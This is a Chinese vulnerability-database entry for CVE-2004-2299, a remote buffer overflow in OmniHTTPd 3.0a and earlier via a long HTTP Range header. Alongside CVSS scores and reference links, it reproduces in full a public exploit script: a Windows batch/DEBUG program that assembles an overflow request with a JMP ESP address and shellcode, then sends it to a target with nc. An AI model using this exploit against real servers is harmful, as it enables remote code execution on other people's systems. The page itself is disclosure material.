CVE-2004-2299
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2013-09-08 00:31:34
NMCOE    

[原文]Buffer overflow in Omnicron OmniHTTPd 3.0a and earlier allows remote attackers to execute arbitrary code via an HTTP GET request with a long Range header.


[CNNVD]Omnicron OmniHTTPD Get请求缓冲区溢出漏洞(CNNVD-200412-232)

        Omnicron OmniHTTPd 3.0a版本及之前版本存在缓冲区溢出漏洞。远程攻击者可以借助带有超长Range标题的HTTP GET请求执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2299
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2299
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-232
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/16190
(VENDOR_ADVISORY)  XF  omnithttpd-range-header-bo(16190)
http://www.securityfocus.com/bid/10376
(UNKNOWN)  BID  10376
http://www.securityfocus.com/archive/1/363651
(UNKNOWN)  BUGTRAQ  20040518 Overflow@OmniHTTPd
http://www.osvdb.org/12944
(UNKNOWN)  OSVDB  12944

- 漏洞信息

Omnicron OmniHTTPD Get请求缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Omnicron OmniHTTPd 3.0a版本及之前版本存在缓冲区溢出漏洞。远程攻击者可以借助带有超长Range标题的HTTP GET请求执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (24129)

Omnicron OmniHTTPD 2.x/3.0 Get Request Buffer Overflow Vulnerability (EDBID:24129)
windows remote
2004-04-23 Verified
0 CoolICE
N/A [点击下载]
source: http://www.securityfocus.com/bid/10376/info

Reportedly OmniHTTPD is affected by a GET request buffer overflow vulnerability. This issue is due to a failure of the application to properly validate string sizes when processing user input.

This issue could allow an attacker to execute arbitrary code with the privileges of the affected web server.

@echo off
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:   OmniHTTPd
:Vendors:       http://www.omnicron.ca
:Version:       <=V3.0a
:Platforms:     Windows
:Bug:           Overflow
:Date:          2004-04-23
:Author:        CoolICE
:E-mail:        CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;if '%1'=='' echo Usage:%0 target&&goto :eof
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need
nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Range: "
!Overflow@length>0xE0
f 117 206 41
!JMPESP@w2k
e 207 12 45 FA 7F
!Shellcode
e 20B EB 1B 5B BE 43 6F 6F 6C BF 49 43 45 21 43 39 3B
e 21B 75 FB 4B 80 33 88 39 73 FC 75 F7 EB 09 E8 E0 FF
e 22B FF FF 43 6F 6f 6C 61 31 88 88 88 D6 60 CE 88 88
e 23B 88 01 8E 03 50 DB E0 F6 50 6A FB 60 C4 88 88 88
e 24B 01 CE 80 DB E0 06 C6 86 64 60 B6 88 88 88 01 CE
e 25B 8C E0 BB BA 88 88 E0 DD DB CD DA DC 77 58 01 CE
e 26B 84 03 50 DB E0 07 6E AC DF 60 96 88 88 88 01 CE
e 27B 98 77 DE 98 77 DE 80 DE EC 29 B8 88 88 88 03 C8
e 28B 84 03 F8 94 25 03 C8 80 D6 4A 8C 88 DB DD DE DF
e 29B 03 E4 AC 90 03 CD B4 03 DC 8D F0 8B 5D 03 C2 90
e 2AB 03 D2 A8 8B 55 6B BA C1 03 BC 03 8B 7D BB 77 74
e 2BB BB 48 24 B2 4C FC 8F 49 47 85 8B 70 63 7A B3 F4
e 2CB AC 9C FD 69 03 D2 AC 8B 55 EE 03 84 C3 03 D2 94
e 2DB 8B 55 03 8C 03 8B 4D 63 8A BB 48 03 5D D7 D6 D5
e 2EB D3 4A 80 88 60 CA 77 77 77 49 43 45 21 0D 0A 0D
E 2FB 0A 00
rcx
1FC
nhttp.tmp
w
q


:run
nc %1 80 < http.tmp
del http.tmp		

- 漏洞信息

12944
OmniHTTPd Get Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-05-18 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站